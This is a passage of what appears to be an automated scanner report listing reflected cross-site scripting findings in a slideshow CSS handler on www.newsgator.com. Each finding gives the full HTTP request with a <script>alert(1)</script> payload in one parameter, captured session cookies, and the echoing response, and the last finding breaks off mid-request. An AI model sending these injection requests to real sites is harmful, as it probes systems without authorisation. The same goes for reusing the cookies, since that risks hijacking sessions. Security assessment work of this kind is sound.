Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload d2745<script>alert(1)</script>43dc6059987 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0d2745<script>alert(1)</script>43dc6059987&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:09 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0d2745<script>alert(1)</script>43dc6059987px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_671 {width:180px;position:relative;margin:0;padding:0;clear:both;}
/*                            */        #mss-slider_671 {width:180px;height:325px;}
/*    loading
...[SNIP]...

3.62. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 4d3c4<script>alert(1)</script>6eee8615daf was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=3254d3c4<script>alert(1)</script>6eee8615daf&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:05 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7814
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_671 {width:180px;position:relative;margin:0;padding:0;clear:both;}
/*                            */        #mss-slider_671 {width:180px;height:3254d3c4<script>alert(1)</script>6eee8615dafpx;}
/*    loading image            */        #slide-loading_671 {width:180px;height:3254d3c4<script>
...[SNIP]...

3.63. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload cb700<script>alert(1)</script>2eeb76a371d was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Defaultcb700<script>alert(1)</script>2eeb76a371d&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:07 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 8142
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
               */        #mss-slider_671 {width:180px;height:325px;}
/*    loading image            */        #slide-loading_671 {width:180px;height:325px;background:transparent url(/DesktopModules/Markit.SlideShow/Templates/Defaultcb700<script>alert(1)</script>2eeb76a371d/loading.gif) no-repeat 50% 50%;text-align:center;}
/*                            */        #slide-wrapper_671 {width:180px;height:325px;display:none;}
/*                            */        #slide-outer_671 {width:180px;height:325px;background:transpa
...[SNIP]...

3.64. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [scbcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the scbcolor request parameter is copied into the HTML document as plain text between tags. The payload 7729e<script>alert(1)</script>549d8b0ab75 was submitted in the scbcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D07729e<script>alert(1)</script>549d8b0ab75&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:30:52 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
------*/

/*--- Play/Pause ---*/
/*                            */        #control-outer_671 {position:absolute;top:2px;right:10px;width:54px;height:13px; z-index:1;background-color:transparent;border:solid 1px #D0D0D07729e<script>alert(1)</script>549d8b0ab75;text-align:center;}
/*    previous button            */        #control-outer_671 #mss-container_671_prev {cursor: pointer;width: 8px;height: 8px;float: left;margin: 2px 4px;background: transparent url('/DesktopModule
...[SNIP]...

3.65. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tbcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tbcolor request parameter is copied into the HTML document as plain text between tags. The payload 3ef75<script>alert(1)</script>b231ec5942f was submitted in the tbcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC3ef75<script>alert(1)</script>b231ec5942f&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:30:49 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7650
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
eat -40px 0;}
/*--------------------------*/

/*--- Timebar Styles ---*/
/*                            */        #timebar-outer_671{position: absolute; top: 4px; left: 10px; width:70px;height:1px;border:solid 1px #CCCCCC3ef75<script>alert(1)</script>b231ec5942f;overflow:hidden;z-index: 1;}
/*                            */        #slide-TimeBar_671{background: #CCCCCC3ef75<script>
...[SNIP]...

3.66. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipbcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipbcolor request parameter is copied into the HTML document as plain text between tags. The payload a95e1<script>alert(1)</script>200e6e3d8d3 was submitted in the tipbcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DBa95e1<script>alert(1)</script>200e6e3d8d3&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:19 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
}
/*                            */        #slide-TimeBar_671{background: #CCCCCC; width: 1px;}
/*--------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DBa95e1<script>alert(1)</script>200e6e3d8d3 !important; padding: 5px; background: #FFFFFF !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !i
...[SNIP]...

3.67. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipbgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipbgcolor request parameter is copied into the HTML document as plain text between tags. The payload a8b57<script>alert(1)</script>18fd0034016 was submitted in the tipbgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFFa8b57<script>alert(1)</script>18fd0034016 HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:22 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
#CCCCCC; width: 1px;}
/*--------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DB !important; padding: 5px; background: #FFFFFFa8b57<script>alert(1)</script>18fd0034016 !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !important; font-weight: bold;padding: 0; margin
...[SNIP]...

3.68. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipborderw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipborderw request parameter is copied into the HTML document as plain text between tags. The payload 2deae<script>alert(1)</script>d190c5c2481 was submitted in the tipborderw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=32deae<script>alert(1)</script>d190c5c2481&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:15 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
dden;z-index: 1;}
/*                            */        #slide-TimeBar_671{background: #CCCCCC; width: 1px;}
/*--------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:32deae<script>alert(1)</script>d190c5c2481px solid #9AC2DB !important; padding: 5px; background: #FFFFFF !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;f
...[SNIP]...

3.69. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tiptcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tiptcolor request parameter is copied into the HTML document as plain text between tags. The payload bd29b<script>alert(1)</script>421f7dd0323 was submitted in the tiptcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666bd29b<script>alert(1)</script>421f7dd0323&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:17 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
es ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DB !important; padding: 5px; background: #FFFFFF !important; max-width: 200px;}
/*                            */        .tool_671-title {color:#666666bd29b<script>alert(1)</script>421f7dd0323 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !important; font-weight: bold;padding: 0; margin: 0; margin-top: -15px; padding-top: 15px; padding-bottom: 5px; }
/*                            
...[SNIP]...

3.70. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the tipw request parameter is copied into the HTML document as plain text between tags. The payload d0f9a<script>alert(1)</script>5291c05a6e9 was submitted in the tipw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=180&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200d0f9a<script>alert(1)</script>5291c05a6e9&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
